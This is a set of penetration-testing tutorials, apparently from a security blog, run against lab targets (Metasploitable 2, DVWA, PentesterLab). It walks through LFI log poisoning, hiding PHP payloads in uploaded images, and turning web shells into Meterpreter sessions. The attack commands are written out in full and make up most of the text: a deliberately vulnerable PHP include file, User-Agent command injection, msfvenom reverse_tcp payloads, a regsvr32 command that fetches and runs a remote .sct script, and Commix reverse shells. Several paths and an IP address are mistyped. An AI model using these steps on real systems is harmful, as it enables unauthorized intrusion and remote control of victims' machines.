Exploit Webserver through Log Injection with LFI

Through this article you will see how to create local file inclusion log posioning inside the target machine and gain unauthourized access with help of apache access .log file.

Attacker: Kali Linux

Target: Metasploitable 2

Connect the target using SSH  service as shown below in the following image

ssh msfadmin@192.168.1.8

Now login with user as “sudo” and create a folder “lfi” inside /var/www

cd /var/www

mkdir lfi

Now create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.

   $file = $_GET['file'];

   if(isset($file))

   {

       include("$file");

   }

   else

   {

       include("index.php");

   }

   ?>

Now I have saved above PHP code inside a text file as lfi.php and share this file.

In order to download lfi.PHP inside the lfi directory type following command

Wget http://192.168.1.25/lfi.php

Now let’s browse following URL: 192.168.1.8/lfi/lfi.php

In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

Now I will try to open apache access.log file and to explore this file first I will give read permission to apache2 and then include the acess.log file.

Now include the acess.log file as file parameter and give following URL inside browser.

192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log

Now turn on burp suite to capture the request of same web page

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.

Add cmd comment inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&c=ps as shown in the below image. Then click on forward.

Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same manner execute lsb_release –a through cmd and view the result from inside the given screenshot.

Web Server Exploitation with LFI and File Upload

In this article you will learn how to bypass file uploading vulnerability in high security through FILE INCLUSION vulnerability. As well as how to bypass local file inclusion to get reverse connection of victim’s Pc.

Attacker: kali Linux

Target: DVWA

First you need to download Exif Piot tool from here. This is a GUI tool for windows users which allow adding exif data and Meta data inside a JPEG, PNG and GIF images.

Now open exif pilot and insert any image to hide malicious comment inside it; from screenshot you can see I have choose shell.png image and then click on EDIT EXIF/IPTC.

Further inside comment text field type as malicious code and click on ok.

Here the exif data has been edited successfully inside the image. This tool replaces the malicious image from the original image in the same folder and sent the original image into recycle bin.

Now explore target IP in browser and login into DVWA with admin: password as credential. Set security level high.

Choose vulnerability file upload to upload the malicious image in the web server application and now browse your malicious image shell.png then click on upload.

It will show the path of uploaded image copy the highlighted path.

Now open the copied path in browser where you will find the uploaded image.

In order to execute the malicious code we need to change the category of vulnerability as well as security level also so that we can execute the hidden comment inside the image.

Now set security level low.

In order to bypass file uploading vulnerability in high security of DVWA we need to set other vulnerability and I have select File Inclusion for this purpose.

File Inclusion allow users to execute any file through URL as I have described above.

Now past the above copied path of uploaded image inside the URL as shown in screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png

Here it has given warning system (): cannot execute blank command which means we need to add some command for execution hence through URL we will be able to execute any command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=ifconfig

Here I try to check network configuration of victim’s Pc and you can see the result of network configuration from screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=dir

Here you can view the directories which I have got by executing dir command in URL.

Now next I will try to achieve meterpreter session using Kali Linux

Type msfconsole and load metasploit framework.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103

msf exploit(regsvr32_applocker_bypass_server) > set lport 1234

msf exploit(regsvr32_applocker_bypass_server) > exploit

regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Copy the above malicious code and send it to victim.

Here paste above .dll malicious code inside the URL and when you will run the code in the browser; attack will get victim’s meterpreter session on his kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Meterpreter session 1 will get open

Meterpreter>sysinfo

Second Way

In second part we will try to combine a malicious PHP file with an image, further use that malicious image for uploading in web application server and then bypass that image in same manner as performed above.

Here first you need to download any .png/.jpg/.gif image and save it on Desktop. Inside Kali Linux I have downloaded an image and save it with the name “a.png” on the desktop. Now open the terminal and type following command to generate a PHP code inside “a.png” image.

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png

Let’s verify whether the image contains the malicious code inside it or not

Cat /root/Desktop/a.png

When you will scroll down the window screen, here you will find that the end part of image contains PHP code. It means we have successfully created the malicious image which ready to upload inside the web application server.

Now repeat the above process to upload the file inside DVWA with security level high. From given screenshot you can see my “a.png” image is successfully uploaded inside the web server.

Copy the highlighted path where image is uploaded.

Before executing image in web server start multi/handler in background inside the kali Linux

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) >exploit

Again set security level low in DVWA and turn on the File Inclusion vulnerability and repeat the same process as above, now the paste the above copied path of uploaded image inside the URL and execute it which will provides reverse connection on kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/a.png

meterpreter > sysinfo

I have got meterpreter session of victim PC

Webshell to Meterpreter

Through this article you will learn how we can achevie meterpreter shell after uploading a PHP backdoor script in victim’s PC. You can read previous article to upload PHP web shell in a web server.

Type msfconsole and load metasploit framework

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.0.104 

msf exploit (web_delivery)>set srvport  8081

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window 

Meterpreter shell using b374k

Now from given screenshot you can see here we have successfully uploaded b374k script and now paste above copied malicious code and execute it as command.

When above code gets execute you will get meterpreter session 1.

msf exploit (web_delivery)>session –I 1

meterpreter> sysinfo

Meterpreter shell using c99 shell

Repeat the same process; after uploading c99 script in a web server now paste that PHP code which we have got through web delivery inside the c99 shell script and execute as command.

This will give you another meterpreter session.

meterpreter> sysinfo

Meterpreter shell using Weevely

Once you have uploaded weevely backdoor inside web server now repeat the same process inside weevely as I have done and past malicious PHP code which we have got through web delivery and hit enter.

Here one more session will get opened for meterpreter shell.

meterpreter> sysinfo

Meterpreter shell using wso2.5.1.php

Now next step is to get meterpreter shell through wso2.5.1.php script and again repeat the same step for web delivery to get the malicious PHP code and past that code under this script and execute as command.

CONGRATS!!!  we have successfully access meterpreter shell through different php script Here we have again a meterpreter session

meterpreter> sysinfo

Command Injection to Meterpreter using Commix

Commix is an automated command injection tool. It lets you have a meterpreter session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers in order find vulnerabilities. In this article we will learn how to get a meterpreter session using commix.

Requirements :

·         DVWA (for Windows 10)

·         PentesterLab (for Linux testing)

·         Kali Linux

·         Commix

As you can see in the image below the environment of DVWA is vulnerable to command injection. Submit the local host request from DVWA.

Capture the previously submitted request through BurpSuite by simultaneously turning on the intercept as shown in the image below :

Once the cookies are capture, copy the whole cookie and paste it in a  TXT file. Now, use the following command in order to exploit the vulnerability of Command injection in the DVWA environment :

commix -r /root/Desktop/req.txt

here,

-r : refers to the path of request file which will load HTTP.

As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :

Now that your are in the pseudo terminal, type the following set of command in order to generate reverse shell :

reverse_tcp

set lhost 192.168.1107

set lport 1234

After executing above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As our DWVA is setup on windows, we will select option 10. Then it will further ask you to choose a particular power shell injection. Choose 1 as of now as we will try other options too.

When everything is done, it will give a resource file with the execution command. Open a new terminal window and type the command there, as in our case it generated the following command :

msfconsole -r /usr/share/commix/powershell_attack.rc

As the above command is executed, you will directly have your meterpreter session as shown in the image above.

Now, repeat the above steps as they are but instead of choosing 1 option of power shell injection choose 2 this time as it will help us get meterpreter session through magic unicorn. After choosing option 2, it will again generate a resource file that is to be executed in the new terminal window. In our case following command was generated :

msfconsole -r /usr/sharae/magic-unicorn/unicorn.rc

Again, when the command is executing you will have your meterpreter session as shown in the image below :

All the above meterpreter session were taken using option 10 under the category of meterpreter reverse shell. But this time we will use option 11, which is web delivery, to have a meterpreter session. So, repeat the same steps as above but this time choose 11 option when asked for which meterpreter reverse shell you want.

Then once you have chosen option 11, it will ask whether you want web delivery script for PHP, Python or windows. Now, as we are attacking windows select option 3.

Once again, it will give you a recourse file and a command that is to be run in the new terminal window. In our case, following command was generated :

msfconsole -r /usr/sharae/commix/web_delivery.rc

 As the command is executed, you will have your meterpreter session as shown in the image below :

Until now, all the meterpreter session we took were in the window’s environment. Now, will be gain meterpreter session in Linux’s environment. For this, we will use PentesterLab.

Just like we did for windows, capture the cookies of pentesterlab in bursuite as shown in the image 

below :

Copy the contents of the cookies in a TXT file and use the following command to attack :

commix -r /root/Desktop/1.txt

As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :

Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :

reverse_tcp

set lhost 192.168.1107

set lport 1234

After executing above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want as in whether you want it to be PHP, Windows, etc. As we are now testing on linux, we will select option 8 i.e. a PHP meterpreter reverse shell.

Just like before, this too will generate a resource file which you have to execute in a new terminal window. In our case, the command generated was :

Msfconsole -r /usr/share/commix/php_meterpreter.rc

 As the above command is executed, you will have you session as shown in the image below :

The other method we will use to exploit linux is by using web delivery. Repeat the above steps similarly, ut instead of choosing option 8, this time choose option 11 for web delivery. And then choose option 2 for a PHP reverse shell.

Executing the above steps will create a resource file yet again. Run the command given in the new terminal window :

msfconsole -r /usr/share/commix/web_delivery.rc

Running the above command will give you  your session as shown in the above image. This is how, you can gain a meterpreter session through command injection vulnerability using commix. The session can be acquired in both windows and linux platforms.